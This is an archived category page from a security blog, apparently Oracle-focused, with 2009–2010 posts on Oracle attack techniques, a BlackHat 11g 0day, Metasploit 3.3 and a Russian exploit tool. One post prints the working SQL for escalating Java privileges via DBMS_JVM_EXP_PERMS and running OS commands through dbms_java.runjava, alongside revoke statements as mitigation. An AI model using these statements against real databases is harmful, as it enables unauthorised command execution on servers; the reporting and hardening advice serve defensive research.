Archive for the ‘Exploit’ Category

Really good whitepaper about „Hacking Oracle from the Web“

Montag, Februar 22nd, 2010

Sumit Siddarth (Sid) has just published a really good whitepaper about „Hacking Oracle from the Web„.This is the most comprehensive published collection of different techniques for attacking Oracle from the web. Sid spent a lot of time composing the different techniques mentioned in various presentations and whitepapers.

Sid describes various techniques like data extraction (inband techniques like union or error messages, out-of-band techniques like heavy queries, blind, …), privilege escalation (sys.kupp$proc, dbms_repcat_rpc and dbms_export_extension)  and OS code execution.

Well done Sid.

Oracle Blackhat video removed from Website

Freitag, Februar 5th, 2010

Blackhat removed the video from David Litchfield (containing the 0day exploit code for 11g) from their website. But it’s too late because the 0day code for 11g can be found in the meantime in many places.

The video was downloaded several times and it’s just a question of time until it re-appears…

BTW Oracle with all security patches is vulnerable against this issue too. But the exploit must be modified a little bit.

Oracle 11g 0day exploit published

Donnerstag, Februar 4th, 2010

I just read on Sumit Siddarth’s (Sid) blog that the video recording from David Litchfield’s BH presentation is online.

David showed how to escalate Java privileges using DBMS_JVM_EXP_PERMS.

CURSOR C1 IS SELECT ‘GRANT’,USER(), ‘SYS’,’’,’<<ALL FILES>>‘,’execute’,’ENABLED’ from dual;

After the Java privilege escalation it is possible to run OS commands using a simple SELECT statement:

select dbms_java.runjava(’oracle/aurora/util/Wrapper c:\\windows\\system32\\cmd.exe /c dir>c:\\out.lst’)from dual;

For security reasons you should:

revoke execute on dbms_java from PUBLIC;
revoke execute on dbms_java_test from PUBLIC;
revoke execute on „oracle/aurora/util/Wrapper“ from PUBLIC;
grant execute on sys.dbms_jvm_exp_perms to IMP_FULL_DATABASE;
grant execute on sys.dbms_jvm_exp_perms to EXP_FULL_DATABASE;
revoke execute on sys.dbms_jvm_exp_perms from PUBLIC;

I just tested the code on my Linux database and it worked without any problem.

SELECT * from dual where chr(42)=DBMS_JAVA.RUNJAVA(‚oracle/aurora/util/Wrapper /bin/touch /tmp/iwashere3‘);

Metasploit 3.3 is out

Dienstag, November 17th, 2009

Metasploit 3.3, the leading exploit framework is out. Here an extract from the Metasploit blog:

Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws.

Version 3.3. (release notes) is the largest known ruby application (375,000 lines of code) and comes with some new Oracle features

  • Support for the Oracle InstantClient Ruby driver as an exploit mixin
  • Extensive support for exploitation and post-exploitation tasks against Oracle databases

Have fun using Metasploit.

New russian Oracle exploit tool „Oracle Security Tools“ (updated)

Freitag, November 13th, 2009

During my research on Russian websites I found a new security tool called „Oracle Security Tools„. This tool offers different methods to exploit Oracle databases.

Oracle Security Tools

Here is a list of features

  • The privileges escalation of the Oracle users;
  • The verification of system accounts concerning the existence of a default password;
  • Account compliance test of login=password
  • The execution of the PL/SQL code;
  • The privileges escalation in the OS Windows 2000/XP/2003 (add a local user as root and holder of remote connection powers);
  • The infiltration into the OS and the execution of DOS-commands, holding the administrative rights.
  • Viewing the users‘ connections to the database and their activity;
  • Analyse the external TNS listener.log;

After checking the executable on virustotal I run the program on one of my test VMwares. After switching the russian interface to the english interface I not able to run the tool. I always got the error message:

It seems to be a problem with my vmware system and the mulitple Oracle Homes. After switching to another computer the program was working without problems.